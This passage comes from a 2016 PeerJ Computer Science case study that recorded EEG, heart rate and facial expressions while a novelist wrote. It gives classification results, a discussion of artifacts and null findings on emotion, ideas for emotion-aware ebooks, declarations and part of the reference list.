early evening. He normally writes for about two hours and fills the time in between with other activities (including other writing activities). During a writing block, he was engaged in other activities as well like answering emails and phone calls etc., but never during the instrumentation and calibration. All activities during the measurement blocks were logged by the experimenter who was always present during the measurements. We measured for nine consecutive days. At the end of the day, the experimenter and the writer would make a specific schedule for the next day. The writer also reflected on his experiences over the day, including the user experience of wearing the equipment and being observed. The day before the start of the experiment, the protocol, instructions etc. were explained in great detail, the writer signed the informed consent, his workplace was instrumented and the equipment tested. Besides the addition of the equipment, the writer’s workplace was not altered in any way to give the writer the best opportunity to behave as usual. On each measurement day, the experimenter came to the apartment as scheduled and followed the protocol as detailed above. At the end of the day, all data were encrypted and saved to an external hard disk. Results Classification of baseline vs. emotion conditions in the calibration blocks First, we determined whether the feature set contained information to discriminate the baseline conditions (Eyes Open and Eyes Closed) from the emotional (writing) epochs using binary classification (baseline vs. non-baseline). For this purpose we performed a ‘leave- one-day-out’ cross validation using the SVM classifier. This method is to be preferred over random N-fold cross validation since it better accounts for possible correlations between data during the day (Lemm et al., 2011). Still, the results when using random folds were found to be comparable to the results of the analysis presented here. It is also important to compensate for the imbalance in the number of conditions, with 36 baseline blocks and 54 emotional blocks in the set. All reported performance scores follow a binomial distribution and the variability of the binomial distribution follows directly from the average score and the number of measurements (the distribution is not well approximated with a Gaussian distribution and therefore the variance is not a good indicator of the variability in the results). For a larger number of measurements the variability is approximately equal to p*(1-p)/N (with p estimated by the score, N the number of measurements). When all six physiology features (i.e., meanHR, HRVlow, HRVmed, HRVhigh, rmssdRRI, meanESK were used as input to the classifier the average model performance (over all days)) was 71%, with a hit-rate (score for correctly classifying baseline blocks) of 58% and a False-Alarm-rate (FA-rate, i.e., fraction of falsely classified emotional blocks) of 20%, resulting in an equal cases (in the situation in which both conditions occur equally frequent) performance of 69% (p < .01). Individual ANOVAs with condition as independent variable (baseline vs. writing) and physiological measure as dependent van Erp et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.60 12/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.60 Figure 3 Results of the physiological measures Heart Rate (A) and rmssd RRI (B) as function of the different calibration blocks. Eyes open and Eyes closed blocks were measured before and after the emo- tional blocks. The order of the emotional blocks was balanced over days. Error bars denote the standard error of the mean. variable showed significant differences for the heart rate variability measures only (all F values > 5.83, all p values < .02). Figure 3 gives the HR and rmssd RRI as function of calibration block. Figure 4 summarizes the power distribution for the different frequency bands averaged over the rest epochs (Fig. 4A) and the writing epochs (Fig. 4B). When the EEG features van Erp et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.60 13/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.60 Figure 4 Column (A) shows the power in the different frequency bands in the rest blocks (eyes open and eyes closed combined) and column (B) in the writing blocks. Column (C) gives the weights of the features in the classification model. van Erp et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.60 14/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.60 were used as input, the average model performance (over all days) was 92% with a hit-rate of 86% and a False-Alarm-rate (FA-rate) of 4%, resulting in an equal cases performance of 91% (p < .01). The model weights are depicted in Fig. 4C. Inspecting Fig. 4 shows that there are three major differences between rest and writing reflected in the model weights. The writing blocks show: (1) increased frontal power in the delta and theta bands, (2) wide spread suppression of alpha, and (3) central increase in beta and gamma activity. The first effect is most likely caused by eye movements. The second effect relates to the suppression of the brain’s idle state during rest. The increase in gamma activity may be related to creative processes as described in ‘The Creative Brain’, but gamma components are also susceptible to muscle artifacts caused by e.g., jaw clenching and forehead movements. If we only use the alpha and gamma features in the classifier, equal class performance is 88%, indicating that a reliable difference can be obtained without using features that may be contaminated with eye movements. When all features (peripheral physiology and EEG) were used as input the average model performance was also 92%, with a hit-rate of 89% and a False-Alarm-rate (FA-rate) of 6%, resulting in an equal cases performance of 92% (p < .01), a non-significant improvement relative to using only EEG features, indicating that the added value of incorporating features other than EEG ones is small in this case. A closer inspection of the feature weights in the classification model showed that the highest weights are attributed to the delta (0–4 Hz) and theta (4–8) bands in channels Fp1, Fpz, Fp2 (i.e., frontal channels). The equal class performance of a classification model using only these six features is 0.84 (compared to 0.92 for a model using all features). Slow (0–4 Hz) frequency bands of EEG may pick up eye movements and should be evaluated with caution (please note that eye movements were not removed from the EEG data). Indirect measurement of eye movements in the EEG signal masks the information in the primary EEG. Even in case it is a reliable classifier for the current experimental setup, we consider it an artifact. Classification of valence and arousal in the calibration blocks Model performance was determined for classifying low vs. high valence and arousal using 10-fold cross validation using a range of parameters: • Features from EEG, physiology or both, • Binary classification for predicting outcomes higher than the median value or using only the extreme values, i.e., lower than the 0.33-quantile or higher than the 0.66-quantile, • Using raw or normalized features, in which case the features were normalized by dividing by the average feature value for the Eyes-Open conditions (for that day), • Using SVM or elastic net classifier with logistic regression. In none of the cases did we find classification performance deviating significantly from chance performance. Since classification performance using the whole set of EEG data did not result in above-chance performance, we did not continue using specific subsets only, e.g., to look at the power in specific EEG frequency bands like alpha (Bahramisharif et al., 2010; Klimesch, Sauseng & Hanslmayr, 2007), at the relative power in different EEG bands (Herbert, Junghofer & Kissler, 2008) and at asymmetrical alpha activity in the prefrontal van Erp et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.60 15/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.60 cortex. Individual ANOVAs on the physiological measures confirmed these observations: all F-values < 0.63 and all p values > .67; see also Fig. 3. Because building a reliable valence and arousal classification algorithm using the calibration data turned out to be impossible, we could not further classify the novel writing data. Facial expression in the calibration blocks We used the FaceReader R© output directly in the analysis and found no significant differences between the different emotional paragraphs. Generally, the facial expression of the writer was classified as neutral (about 30%), sad (about 25%) or angry (about 20%). The remaining 25% was dispersed over happy, surprised, scared and disgusted. Subjective questionnaires The DES full showed neither differences over the days (1–9) nor over sessions (start—end of day). Analysis of the feelings grid scores showed a significant effect of arousal over sessions: F(3,31)=4.57, p < .01. A post-hoc LSD test showed a significant difference between start of the day and the end of block 2 and end of the day. The analyses of the VAS scores showed no effect over days, but a large effect over sessions of happy: F(3,31)=3.65, p < .03, optimistic: F(3,31)=6.28, p < .01 and flow: F(3,31)=6.76, p < .001, and a trend for relaxed: F(3,31)=2.38, p < .09. The means of the significant effects over session are presented in Fig. 5. The figure shows that happy, optimism and flow are rated high at the start of the day but systematically decrease over the writing sessions with a stabilization or reversal at the end of the day. For arousal, this effect is inverted. These trends are confirmed by post-hoc LSD tests. In the daily debriefing session at the end of the day, the writer indicated that the EEG cap was uncomfortable at the start but that he got used to wearing the cap and the other physiological sensors. He experienced the cameras as more obtrusive and disturbing than the physiological sensors. He elaborated on this in several public interviews (e.g., in The New York Times: www.nyti.ms/1dGxkFR). Discussion Set-up and user experience The case study primarily focussed on measuring neurophysiological indices over prolonged periods outside a laboratory environment before applying the technology in a large scale experiment with the readers of the novel. Inspection of the signals revealed that, except for EEG channels O1, Oz and O2, we were able to record reliable signals in a real life situation using wearable/wireless sensor technology and that the setup was comfortable enough for the writer to work for hours a day wearing the sensors. The noise in the occipital channels may be caused by (neck) muscle activity related to mouse and keyboard actions. The ICA analysis indicated that potential artifacts were non-stationary (i.e., changed over time), an effect similar to what we find with readers (Brouwer et al., 2015). Non-stationarities may be more common in real-world, multitasking environments and hamper identification and removal of artifacts (Van Erp, Lotte & Tangermann, 2012). This increases the relevance of including EMG and EOG sensors to the sensor suite. Data analysis may also benefit from a higher electrode density allowing to apply more advanced techniques for artifact removal van Erp et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.60 16/26 https://peerj.com http://www.nyti.ms/1dGxkFR http://dx.doi.org/10.7717/peerj-cs.60 Figure 5 Significant changes in subjective ratings over the course of a writing day. and EEG analysis. Recent electrode developments may enable this without reducing usability and comfort over prolonged periods of use. Although measuring physiology outside a well-controlled laboratory environment is challenging, the data show reliable differences between resting state and writing, which indicates a sufficient signal-to-noise ratio in the data. It could still be the case that this ‘‘writing detector’’ is triggered by artifacts like eye movements or muscle activity that comes with typing (however, the EEG channels most prone to these muscle artifacts (O1, Oz and O2) were removed from the dataset). If we look at the weight of the different features in the classification algorithm, we see that most weight is attributed to the delta (0–4 Hz) and theta (4–8) bands in the frontal channels (Fp1, Fpz, Fp2). Low frequency bands should be evaluated with caution as they may reflects eye movements rather than signals in the primary EEG. This is especially relevant for the current dataset since (eye movement) artifacts were non-stationary and could not be reliably identified and removed. However, the classifier is also based on suppression of alpha and increased central gamma activity during writing. This matches with the expected pattern for creative writing although one should note that gamma can also be affected by e.g., jaw clenching artifacts. In addition, the current differences in physiology like increased heartrate and decreased heartrate variability (see Fig. 3) do fit with an interpretation of low (rest) and high cognitive activity (writing) and not just with simple muscle activity. To exclude the aforementioned artifacts, a comparison should be made between writing about an emotion, writing down mundane instructions, and for instance copying text or making random typing movements. Neurophysiology of emotional writing Since there are no data available about neurophysiological correlates of emotional writing, we based our expectations on research into physiological responses based on presenting van Erp et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.60 17/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.60 many repetitions of, for instance, emotional pictures or sounds. In this domain, recent experiments show that changes in emotional state can also be reliably identified with a restricted number of repetitions or even single trial (especially for longer epochs like in our study). Therefore, we expected to be able to see changes in physiological state as a function of emotional content, despite the limited number of repetitions. However, we were not able to link specific neurophysiological indices to the emotional content of the writing. We have three possible explanations: (1) the quantity and/or quality of the data was not sufficient, (2) writing is a cognitive rather than an emotional task for this particular author, and (3) the task involved a multitude of emotional, creative and cognitive processes concealing the single-task indices found in single-task laboratory experiments. The first explanation pleads for expanding the data set using more authors and possibly more sessions than we were currently able to gather. Nevertheless, we should keep in mind that the current data was sufficiently reliable to classify rest from writing with 92% accuracy, and the employed classifications methods are sensitive enough to be used on smaller datasets. This forces us to look into alternative explanations as well before upscaling. One such explanation is that for this particular writer, the writing process itself may predominantly be a cognitive task and unrelated to the emotional content, i.e., the writer does not experience a particular emotion himself when writing about it. The neurophysiological pattern found in writing compared to rest and the facial expression (often classified as neutral) fit with the signature of a cognitive task. Based on the vast production of the writer and as confirmed in later discussion with him, this is a viable option. In hindsight, the time pressure (2 min per item), the strict instruction (write about this particular emotion fitting with this particular picture), the time of day (always in the morning before the writing block started), and the presence of the experimenter may all have triggered cognitive controlled creativity rather than emotional or spontaneous creativity. The third factor that may have played a role in the current results is the task setting that may have resulted in multiple processes (including but not limited to emotional, associative, creative, linguistic and motor planning processes). The resulting brain activity patterns may not be comparable to those for passive viewing of emotional pictures in a laboratory environment. Subjective ratings The ratings of arousal, happy, optimistic and flow seem to show the same pattern. At the start of the day, the writer is in a ‘relaxed, good mood’ but his mood seems to dwindle during the writing with increasing arousal. At the end of the day, after the last writing session, this pattern stabilizes or is reversed. This profile in part reflects the circadian modulation of mood and related aspects. THE EBOOK OF THE FUTURE One may ask if uncovering brain states associated with art will de-mythologize the process: will art lose its meaning, beauty or purity when reduced to activity of groups of neurons? Will we eventually reveal the mechanisms of art and thus render it mechanical? Will scientists be able to develop a drug that makes everyone a best-selling author? Will this knowledge increase the ‘creativity rat race’ for artistic and creative success as cognitive van Erp et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.60 18/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.60 enhancers may do in the ‘cognitive rat race’ in the academic world (Repantis et al., 2010)? We think not—but raising and discussing these questions is of utmost importance for the field (Van Erp, Lotte & Tangermann, 2012). A more interesting debate is whether creative writing is a skill one can develop like skilled behavior in sports and music, or possibly even non-creative writing like scientists and journalists do on a daily basis. Creative skills are important outside the arts and the creative industry and their importance is widely acknowledged in an innovative and knowledge-based economy. We would like to expand our research into (spontaneous) creativity to answer important questions and develop appropriate tests and tools to measure spontaneous creativity (which may require 24 h measurements). Current ebooks have the ability to track reader behavior and ebook retailers are actively gathering (anonymous) data of their readers on parameters such as the books the reader has finished (or not), how fast, where reading was discontinued and for how long and which words were looked up in a connected dictionary (Flood, 2014). None of this information is directly used for the benefit of the reader but serves manufacturers and publishers only. The basis for our approach is to measure the readers’ state and behavior to make them the primary beneficiaries, for instance through enhancing the reader experience. There are many approaches foreseeable. A relatively simple one that is not interactive yet is to use the emotional response to give better informed advice on other books the reader may enjoy. In a similar way, readers may want to share their emotional profile, for instance by posting it on social media or through new communities of people with similar frames of mind around a specific book. Real interactivity may also come in many forms. For instance, the emotional response may be used to add music or other multisensory stimuli to further intensify the experience or ultimately change the storyline or the flow of the book. This may lead to new media products that are somewhere in between literature, movies and games. ACKNOWLEDGEMENTS We kindly acknowledge the great help of Christian Vermorken and Marc Grootjen from Eaglescience, Andrew Spink from Noldus IT, and Leo Hoogendoorn from TMSi for providing hardware and software components and helping us with the measurements and analyses. We sincerely thank Arnon Grunberg and his publishers Elik Lettinga and Paulien Loerts from Nijgh & Van Ditmar for sharing their time and their creative minds. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. van Erp et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.60 19/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.60 Author Contributions • Jan B.F. van Erp conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. • Maarten A. Hogervorst analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Ysbrand D. van der Werf conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. Ethics The following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): The Institutional Review Board of TNO Human Factors (TCPE Soesterberg, The Netherlands) approved this study. Data Availability The following information was supplied regarding data availability: This article describes the data of a single participant who is mentioned by name. To protect his privacy (including full address), the raw data will only be available to those signing a non-disclosure agreement with the first author’s institution (TNO). Please contact the corresponding author for more information. REFERENCES Arden R, Chavez RS, Grazioplene R, Jung RE. 2010. Neuroimaging creativity: a psycho- metric view. Behavioural Brain Research 214(2):143–156 DOI 10.1016/j.bbr.2010.05.015. Bahramisharif A, Van Gerven M, Heskes T, Jensen O. 2010. Covert attention allows for continuous control of brain–computer interfaces. European Journal of Neuroscience 31(8):1501–1508 DOI 10.1111/j.1460-9568.2010.07174.x. Bal PM, Veltkamp M. 2013. How does fiction reading influence empathy? An ex- perimental investigation on the role of emotional transportation. PLoS ONE 8(1):e55341 DOI 10.1371/journal.pone.0055341. Barrett LF, Russell JA. 1999. The structure of current affect: controversies and emerging consensus. Current Directions in Psychological Science 8(1):10–14 DOI 10.1111/1467-8721.00003. Bayer M, Sommer W, Schacht A. 2010. Reading emotional words within sentences: the impact of arousal and valence on event-related potentials. International Journal of Psychophysiology 78(3):299–307 DOI 10.1016/j.ijpsycho.2010.09.004. Berns GS, Blaine K, Prietula MJ, Pye BE. 2013. Short- and long-term effects of a novel on connectivity in the brain. Brain Connectivity 3(6):590–600 DOI 10.1089/brain.2013.0166. van Erp et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.60 20/26 https://peerj.com http://dx.doi.org/10.1016/j.bbr.2010.05.015 http://dx.doi.org/10.1111/j.1460-9568.2010.07174.x http://dx.doi.org/10.1371/journal.pone.0055341 http://dx.doi.org/10.1111/1467-8721.00003 http://dx.doi.org/10.1111/1467-8721.00003 http://dx.doi.org/10.1016/j.ijpsycho.2010.09.004 http://dx.doi.org/10.1089/brain.2013.0166 http://dx.doi.org/10.1089/brain.2013.0166 http://dx.doi.org/10.7717/peerj-cs.60 Berntson GG, Bigger JT, Eckberg DL, Grossman P, Kaufmann PG, Malik M, Nagaraja HN, Porges SW, Saul JP, Stone PH, Van der Molen MW. 1997. Heart rate vari- ability: origins, methods, and interpretive caveats. Psychophysiology 34(6):623–648 DOI 10.1111/j.1469-8986.1997.tb02140.x. Brouwer A-M, Hogervorst MA, Herman P, Kooi F. 2009. Are you really looking? Finding the answer through fixation patterns and EEG. In: Lecture notes in artificial intelligence, Vol. 5638: Proceedings of the 5th international conference on foundations of augmented cognition, 329–338. Brouwer A-M, Hogervorst M, Reuderink B, Van der Werf Y, Van Erp JBF. 2015. Physiological signals distinguish between reading emotional and non-emotional sections in a novel. Brain–Computer Interfaces 2(2–3):76–89 DOI 10.1080/2326263X.2015.1100037. Brouwer A-M, Zander TO, Van Erp JBF, Korteling H, Bronkhorst AW. 2015. Using neurophysiological signals that reflect cognitive or affective state: six recommenda- tions to avoid common pitfalls. Frontiers in Neuroscience 9:00136 DOI 10.3389/fnins.2015.00136. Carlsson I, Wendt PE, Risberg J. 2000. On the neurobiology of creativity. Differ- ences in frontal activity between high and low creative subjects. Neuropsychologia 38(6):873–885 DOI 10.1016/S0028-3932(99)00128-1. Carreiras M, Armstrong BC, Perea M, Frost R. 2014. The what, when, where, and how of visual word recognition. Trends in Cognitive Sciences 18(2):90–98 DOI 10.1016/j.tics.2013.11.005. Chávez-Eakle RA, Graff-Guerrero A, García-Reyna J-C, Vaugier V, Cruz-Fuentes C. 2007. Cerebral blood flow associated with creative performance: a comparative study. NeuroImage 38(3):519–528 DOI 10.1016/j.neuroimage.2007.07.059. Citron FMM. 2012. Neural correlates of written emotion word processing: a review of recent electrophysiological and hemodynamic neuroimaging studies. Brain & Language 122:211–226 DOI 10.1016/j.bandl.2011.12.007. Colibazzi T, Posner J, Wang Z, Gorman D, Gerber A, Yu S, Zhu H, Kangarlu A, Duan Y, Russell JA, Peterson BS. 2010. Neural systems subserving valence and arousal during the experience of induced emotion. Emotion 10:377–389 DOI 10.1037/a0018484. Dalgleish T. 2004. The emotional brain. Nature Reviews Neuroscience 5(7):582–589. Dehaene S, Cohen L, Morais J, Kolinsky R. 2015. Illiterate to literate: behavioural and cerebral changes induced by reading acquisition. Nature Reviews Neuroscience 16:234–244 DOI 10.1038/nrn3924. Dietrich A. 2004. The cognitive neuroscience of creativity. Psychonomic Bulletin and Review 11(6):1011–1026 DOI 10.3758/BF03196731. Dietrich A, Kanso R. 2010. A review of EEG, ERP, and neuroimaging studies of creativity and insight. Psychological Bulletin 136(5):822–848 DOI 10.1037/a0019749. Dockray S, Steptoe A. 2010. Positive affect and psychobiological processes. Neuroscience & Biobehavioral Reviews 35(1):69–75 DOI 10.1016/j.neubiorev.2010.01.006. van Erp et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.60 21/26 https://peerj.com http://dx.doi.org/10.1111/j.1469-8986.1997.tb02140.x http://dx.doi.org/10.1111/j.1469-8986.1997.tb02140.x http://dx.doi.org/10.1080/2326263X.2015.1100037 http://dx.doi.org/10.3389/fnins.2015.00136 http://dx.doi.org/10.1016/S0028-3932(99)00128-1 http://dx.doi.org/10.1016/j.tics.2013.11.005 http://dx.doi.org/10.1016/j.tics.2013.11.005 http://dx.doi.org/10.1016/j.neuroimage.2007.07.059 http://dx.doi.org/10.1016/j.bandl.2011.12.007 http://dx.doi.org/10.1037/a0018484 http://dx.doi.org/10.1037/a0018484 http://dx.doi.org/10.1038/nrn3924 http://dx.doi.org/10.3758/BF03196731 http://dx.doi.org/10.1037/a0019749 http://dx.doi.org/10.1016/j.neubiorev.2010.01.006 http://dx.doi.org/10.7717/peerj-cs.60 Ekman P. 1992. Are there basic emotions? Psychological Review 99(3):550–553 DOI 10.1037/0033-295X.99.3.550. Ellamil M, Dobson C, Beeman M, Christoff K. 2012. Evaluative and generative modes of thought during the creative process. NeuroImage 59(2):1783–1794 DOI 10.1016/j.neuroimage.2011.08.008. Erhard K, Kessler F, Neumann N, Ortheil H-J, Lotze M. 2014. Professional training in creative writing is associated with enhanced fronto-striatal activity in a literary text continuation task. NeuroImage 100:15–23 DOI 10.1016/j.neuroimage.2014.05.076. Fink A, Benedek M. 2014. EEG alpha power and creative ideation. Neuroscience and Biobehavioral Reviews 44:111–123 DOI 10.1016/j.neubiorev.2012.12.002. Fleureau J, Guillotel P, Orlac I. 2013. Affective benchmarking of movies based on the physiological responses of a real audience. In: Proceedings—2013 humaine association conference on affective computing and intelligent interaction, ACII 2013, art. no. 6681410, 73–77. Flood A. 2014. Ebooks can tell which novels you didn’t finish. In: The Guardian: 2014 December 10, Books section. Available at http://www.theguardian.com/books/2014/ dec/10/kobo-survey-books-readers-finish-donna-tartt. Fox NA. 1991. If it’s not left: it’s right electroencephalograph asymmetry and the development of emotion. American Psychologist 46(8):863–872 DOI 10.1037/0003-066X.46.8.863. Fredrickson BL, Tugade MM, Waugh CE, Larkin GR. 2003. What good are positive emotions in crises? A prospective study of resilience and emotions following the terrorist attacks on the United States on September 11th, 2001. Journal of Personality and Social Psychology 84(2):365–376 DOI 10.1037/0022-3514.84.2.365. Friedman J, Hastie T, Tibshirani R. 2010. Regularization paths for generalized linear models via coordinate descent. Journal of Statistical Software 33:1–22 DOI 10.18637/jss.v033.i01. Golland Y, Keissar K, Levit-Binnun N. 2015. Studying the dynamics of autonomic activity during emotional experience. Psychophysiology 51(11):1101–1111 DOI 10.1111/psyp.12261. Grunberg A. 2013. Merit. Available at http://www.arnongrunberg.com/blog/2581-merit. Hasson U, Landesman O, Knappmeyer B, Vallines I, Rubin N, Heeger DJ. 2008. Neurocinematics: the neuroscience of film. Projections 2(1):1–26. Herbert C, Ethofer T, Anders S, Junghöfer M, Wildgruber D, Grodd W, Kissler J. 2009. Amygdala activation during reading of emotional adjectives—an advan- tage for pleasant content. Social Cognitive and Affective Neuroscience 4:35–49 DOI 10.1093/scan/nsn027. Herbert C, Junghofer M, Kissler J. 2008. Event related potentials to emotional adjectives during reading. Psychophysiology 45(3):487–498 DOI 10.1111/j.1469-8986.2007.00638.x. He Q, Xue G, Chen C, Chen C, Lu Z-L, Dong Q. 2013. Decoding the neuroanatomical basis of reading ability: a multivoxel morphometric study. Journal of Neuroscience 33(31):12835–12843 DOI 10.1523/JNEUROSCI.0449-13.2013. van Erp et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.60 22/26 https://peerj.com http://dx.doi.org/10.1037/0033-295X.99.3.550 http://dx.doi.org/10.1037/0033-295X.99.3.550 http://dx.doi.org/10.1016/j.neuroimage.2011.08.008 http://dx.doi.org/10.1016/j.neuroimage.2011.08.008 http://dx.doi.org/10.1016/j.neuroimage.2014.05.076 http://dx.doi.org/10.1016/j.neubiorev.2012.12.002 http://www.theguardian.com/books/2014/dec/10/kobo-survey-books-readers-finish-donna-tartt http://www.theguardian.com/books/2014/dec/10/kobo-survey-books-readers-finish-donna-tartt http://dx.doi.org/10.1037/0003-066X.46.8.863 http://dx.doi.org/10.1037/0022-3514.84.2.365 http://dx.doi.org/10.18637/jss.v033.i01 http://dx.doi.org/10.18637/jss.v033.i01 http://dx.doi.org/10.1111/psyp.12261 http://dx.doi.org/10.1111/psyp.12261 http://www.arnongrunberg.com/blog/2581-merit http://dx.doi.org/10.1093/scan/nsn027 http://dx.doi.org/10.1093/scan/nsn027 http://dx.doi.org/10.1111/j.1469-8986.2007.00638.x http://dx.doi.org/10.1523/JNEUROSCI.0449-13.2013 http://dx.doi.org/10.7717/peerj-cs.60 Holt DJ, Lynn SK, Kuperberg GR. 2009. Neurophysiological correlates of com- prehending emotional meaning in context. Journal of Cognitive Neuroscience 21(11):2245–2262 DOI 10.1162/jocn.2008.21151. Hsu C-T, Conrad M, Jacobs AM. 2014. Fiction feelings in Harry Potter: haemodynamic response in the mid-cingulate cortex correlates with immersive reading experience. NeuroReport 25(17):1356–1361 DOI 10.1097/WNR.0000000000000272. Ishizu T, Zeki S. 2013. The brain’s specialized systems for aesthetic and perceptual judg- ment. European Journal of Neuroscience 37(9):1413–1420 DOI 10.1111/ejn.12135. Isotani T, Lehmann D, Pascual-Marqui RD, Fukushima M, Saito N, Yagyu T, Ki- noshita T. 2002. Source localization of brain electric activity during positive, neutral and negative emotional states. International Congress Series 1232:165–173 DOI 10.1016/S0531-5131(02)00166-8. Johansen JD. 2010. Feelings in literature. Integrative Psychological and Behavioral Science 44(3):185–196 DOI 10.1007/s12124-009-9112-0. Johnson DR. 2012. Transportation into a story increases empathy, prosocial behavior, and perceptual bias toward fearful expressions. Personality and Individual Differences 52(2):150–155 DOI 10.1016/j.paid.2011.10.005. Kawabata H, Zeki S. 2004. Neural correlates of beauty. Journal of Neurophysiology 91(4):1699–1705 DOI 10.1152/jn.00696.2003. Kidd DC, Castano E. 2013. Reading literary fiction improves theory of mind. Science 342(6156):377–380 DOI 10.1126/science.1239918. Kissler J, Assadollahi R, Herbert C. 2006. Emotional and semantic networks in visual word processing: insights from ERP studies. Progress in Brain Research 156:147–183 DOI 10.1016/S0079-6123(06)56008-X. Klimesch W, Sauseng P, Hanslmayr S. 2007. EEG alpha oscillations: the inhibition- timing hypothesis. Brain Research Reviews 53:63–88 DOI 10.1016/j.brainresrev.2006.06.003. Ko K-E, Yang H-C, Sim K-B. 2009. Emotion recognition using EEG signals with relative power values and Bayesian network. International Journal of Control, Automation and Systems 7(5):865–870 DOI 10.1007/s12555-009-0521-0. Kreibig SD. 2010. Autonomic nervous system activity in emotion: a review. Biological Psychology 84(3):394–421. Kuchinke L, Jacobs AM, Gubrich C, Võ ML-H, Conrad M, Herrmann M. 2005. Incidental effects of emotional valence in single word processing: an fMRI study. NeuroImage 28:1022–1032 DOI 10.1016/j.neuroimage.2005.06.050. Lang PJ, Bradley MM, Cuthbert BN. 2008. International affective picture system (IAPS): affective ratings of pictures and instruction manual. Technical Report A-8. Gainesville: University of Florida. Lemm S, Blankertz B, Dickhaus T, Müller KR. 2011. Introduction to machine learning for brain imaging. NeuroImage 56(2):387–399 DOI 10.1016/j.neuroimage.2010.11.004. Leslie G, Ojeda A, Makeig S. 2014. Measuring musical engagement using expressive movement and EEG brain dynamics. Psychomusicology: Music, Mind, and Brain 24(1):75–91 DOI 10.1037/pmu0000031. van Erp et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.60 23/26 https://peerj.com http://dx.doi.org/10.1162/jocn.2008.21151 http://dx.doi.org/10.1097/WNR.0000000000000272 http://dx.doi.org/10.1111/ejn.12135 http://dx.doi.org/10.1016/S0531-5131(02)00166-8 http://dx.doi.org/10.1016/S0531-5131(02)00166-8 http://dx.doi.org/10.1007/s12124-009-9112-0 http://dx.doi.org/10.1016/j.paid.2011.10.005 http://dx.doi.org/10.1152/jn.00696.2003 http://dx.doi.org/10.1126/science.1239918 http://dx.doi.org/10.1016/S0079-6123(06)56008-X http://dx.doi.org/10.1016/S0079-6123(06)56008-X http://dx.doi.org/10.1016/j.brainresrev.2006.06.003 http://dx.doi.org/10.1007/s12555-009-0521-0 http://dx.doi.org/10.1016/j.neuroimage.2005.06.050 http://dx.doi.org/10.1016/j.neuroimage.2010.11.004 http://dx.doi.org/10.1037/pmu0000031 http://dx.doi.org/10.7717/peerj-cs.60 Lewis PA, Critchley HD, Rotshtein P, Dolan RJ. 2007. Neural correlates of processing valence and arousal in affective words. Cerebral Cortex 17:742–748. Lewis RS, Weekes NY, Wang TH. 2007. The effect of a naturalistic stressor on frontal EEG asymmetry, stress, and health. Biological Psychology 75(3):239–247 DOI 10.1016/j.biopsycho.2007.03.004. Limb CJ, Braun AR. 2008. Neural substrates of spontaneous musical performance: an fMRI study of jazz improvisation. PLoS ONE 3(2):e1679 DOI 10.1371/journal.pone.0001679. Liu S, Chow HM, Xu Y, Erkkinen MG, Swett KE, Eagle MW, Rizik-Baer DA, Braun AR. 2012. Neural correlates of lyrical improvisation: an fMRI study of freestyle rap. Scientific Reports 2:Article 834 DOI 10.1038/srep00834. Lotze M, Erhard K, Neumann N, Eickhoff SB, Langner R. 2014. Neural correlates of verbal creativity: differences in resting-state functional connectivity associated with expertise in creative writing. Frontiers in Human Neuroscience 8:00516. Mar RA, Oatley K, Djikic M, Mullin J. 2011. Emotion and narrative fiction: interactive influences before, during, and after reading. Cognition and Emotion 25(5):818–833 DOI 10.1080/02699931.2010.515151. Mauss IB, Robinson MD. 2009. Measures of emotion: a review. Cognition and Emotion 23(2):209–237 DOI 10.1080/02699930802204677. Mayseless N, Aharon-Peretz J, Shamay-Tsoory S. 2014. Unleashing creativity: the role of left temporoparietal regions in evaluating and inhibiting the generation of creative ideas. Neuropsychologia 64:157–168 DOI 10.1016/j.neuropsychologia.2014.09.022. Mihov KM, Denzler M, Förster J. 2010. Hemispheric specialization and creative thinking: a meta-analytic review of lateralization of creativity. Brain and Cognition 72(3):442–448 DOI 10.1016/j.bandc.2009.12.007. Min Y-K, Chung S-C, Min B-C. 2005. Physiological evaluation on emotional change induced by imagination. Applied Psychophysiology Biofeedback 30(2):137–150 DOI 10.1007/s10484-005-4310-0. Muehl C, Van Den Broek E, Brouwer A-M, Nijboer F, Van Wouwe N, Heylen D. 2011. Multi-modal affect induction for affective brain–computer interfaces. In: Affective computing and intelligent interaction—lecture notes in computer science. Vol. 6974/2011. Berlin Heidelberg: Springer, 235–245. Available at http://link.springer. com/chapter/10.1007%2F978-3-642-24600-5_27. Nijhof AD, Willems RM. 2015. SimulatingFiction: individual differences in lit- erature comprehension revealed with fMRI. PLoS ONE 10(2):e0116492 DOI 10.1371/journal.pone.0116492. Piffer D. 2012. Can creativity be measured? An attempt to clarify the notion of creativity and general directions for future research. Thinking Skills and Creativity 7:258–264 DOI 10.1016/j.tsc.2012.04.009. Posner J, Russell JA, Gerber A, Gorman D, Colibazzi T, Yu S, Wang Z, Kangarlu A, Zhu H, Peterson BS. 2009. The neurophysiological bases of emotion: an fMRI study of the affective circumplex using emotion-denoting words. Human Brain Mapping 30:883–895 DOI 10.1002/hbm.20553. van Erp et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.60 24/26 https://peerj.com 